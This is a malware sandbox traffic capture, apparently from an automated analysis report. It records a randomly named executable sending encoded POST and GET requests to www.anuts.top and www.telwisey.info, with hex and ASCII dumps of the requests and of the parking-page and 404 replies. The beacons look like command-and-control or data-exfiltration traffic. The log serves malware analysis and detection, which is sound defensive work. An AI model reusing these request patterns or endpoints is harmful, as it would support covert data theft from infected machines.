                Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                Aug 19, 2024 04:28:11.205193043 CEST430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.46189123.251.54.212804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:16.811882973 CEST757OUTPOST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 38 4e 56 59 46 37 36 7a 48 74 43 32 4e 56 42 6d 44 45 34 6b 37 54 45 67 59 4a 75 4e 77 4d 45 48 51 3d 3d
                Data Ascii: lH=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.46189223.251.54.212804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:19.346071959 CEST777OUTPOST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 33 33 39 66 41 61 41 7a 78 4e 63 57 73 66 66 4b 42 45 6e 70 58 4e 38 42 67 2b 58 39 66 65 52 6f 4d 3d
                Data Ascii: lH=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.46189323.251.54.212804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:21.887839079 CEST10859OUTPOST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6b 41 6e 35 38 46 54 6a 41 78 75 71 34 50 65 75 4e 34 62 4d 42 70 67 58 55 4a 67 58 62 68 38 38 72 58 6e 38 68 4e 4d 4e 65 72 41 4e 74 46 36 50 68 6e 36 66 6f 53 68 53 6a 65 79 70 4f 35 39 72 30 35 52 39 64 46 6c 75 37 47 76 67 4e 45 49 66 54 45 35 50 6d 42 33 74 6a 2b 49 57 78 6f 74 52 75 35 42 6d 49 71 68 6b 4e 72 46 77 2b 70 79 61 4a 61 47 6b 32 38 6a 4a 42 78 6f 2b 53 35 7a 6c 6d 52 78 6e 58 32 30 77 7a 58 63 61 56 78 59 70 45 48 33 4c 6d 69 49 68 36 63 66 6a 78 63 67 76 6e 77 43 52 46 53 [TRUNCATED]
                Data Ascii: lH=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1kAn58FTjAxuq4PeuN4bMBpgXUJgXbh88rXn8hNMNerANtF6Phn6foShSjeypO59r05R9dFlu7GvgNEIfTE5PmB3tj+IWxotRu5BmIqhkNrFw+pyaJaGk28jJBxo+S5zlmRxnX20wzXcaVxYpEH3LmiIh6cfjxcgvnwCRFSUk+54ZwXMq2uVfWg45fy3AGQzdV0Np8TVLwPRY+/xdMHOnXEhv4iPmemX/cOS94WU0d5qD9i2AgKZpGX3/iXT2LKbDQeBHqjcbvsf+3uO3lEe9uh4Ic1bpTELlpQIIkNOadANHvb2C0G47hpS289mPWEhU7agJWFP1Kjltroa6VdCUJXYi6RC8YAjamqKG1ttCF866n89Nmtq2ZqOPRKfrd2pc43BKWWf72kNi4RViUj1q1SPEjdVm1Tkyr4Pan9tieLsBpAAXZ6Vvb5sZC+bzduLc39lWejU3hpNfJUflhfJ9Xq2YfXc9K7daT1HyNKaI4/lCZZpBzAPxt17F6LMfSFJ9zlL13wXv9AAr2wEAzVXuP/h+S6x9x0umTug7oSrXBy1AB/jhwv504FVZRVAmxjbmiq7Bsq4IeezFzTvYJc6VdOD271QYJRHBOkstDKbE6JIo8zAUTUl7oPkBMVEyJV9n9oKjAKRPffXfF64OV5uQZQFlpvDA+SK0q+oyZo2uZjaKtuVhNz3NKtMTJUQ5ulyjMEt7leYc0i4cvfds3Qzvqd0bB+iVWlRBjZ91MOqiOzRhPrRRrZPs9Zy+QIeQEM7PWKnC3fqHQ7ryMGqy9dfROe88xB4BSGqQQ+7qgDFbWpWM9wS/mi41cuCi27sKlzLY1E7jVTQr [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.46189423.251.54.212804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:24.420876026 CEST502OUTGET /li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.anuts.top
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.461895199.192.19.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:50.861352921 CEST769OUTPOST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 4e 4b 57 2f 30 38 51 37 61 6f 75 35 49 44 46 77 49 77 30 57 2f 34 6a 44 6e 74 36 38 6d 2f 74 69 41 3d 3d
                Data Ascii: lH=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==
                Aug 19, 2024 04:28:51.482146025 CEST1236INHTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:51 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 19, 2024 04:28:51.482197046 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                Aug 19, 2024 04:28:51.482266903 CEST448INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                Aug 19, 2024 04:28:51.482300043 CEST1236INData Raw: 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30 37 22 20 79 32 3d 22 32 36 36 2e 35 38 31 22
                Data Ascii: erlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="508.129" y1="255
                Aug 19, 2024 04:28:51.482333899 CEST1236INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 30 30 2e 36 37 22 20 79 31 3d 22
                Data Ascii: stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                Aug 19, 2024 04:28:51.482366085 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <line fill="none"
                Aug 19, 2024 04:28:51.482398987 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                Aug 19, 2024 04:28:51.482435942 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                Aug 19, 2024 04:28:51.482466936 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                Aug 19, 2024 04:28:51.482501984 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                Aug 19, 2024 04:28:51.487428904 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.461896199.192.19.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:53.391957045 CEST789OUTPOST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 63 51 65 67 6b 4f 78 6c 43 6b 35 47 45 62 77 57 33 74 63 79 32 51 77 30 33 63 64 55 38 4d 51 42 59 3d
                Data Ascii: lH=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
                Aug 19, 2024 04:28:53.995450974 CEST1236INHTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:53 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 19, 2024 04:28:53.995497942 CEST224INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705
                Aug 19, 2024 04:28:53.995533943 CEST1236INData Raw: 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22
                Data Ascii: ,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"> <circle fil
                Aug 19, 2024 04:28:53.995568037 CEST1236INData Raw: 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: 8-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
